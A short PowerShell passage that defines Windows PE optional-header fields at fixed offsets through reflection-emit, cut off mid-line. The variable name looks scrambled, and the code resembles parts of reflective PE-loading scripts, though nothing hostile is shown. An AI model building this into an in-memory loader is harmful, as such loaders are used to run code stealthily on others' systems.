($LHFSser.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
($LHFSser.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
($LHFSser.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
($LHFSser.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
($LHFSser.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
($LHFSser.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
($LHFSser.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
($LHFSser.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
($LHFSser.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
($LHFSser.DefineField('DllCharacteristics', $DllCharacteristicsType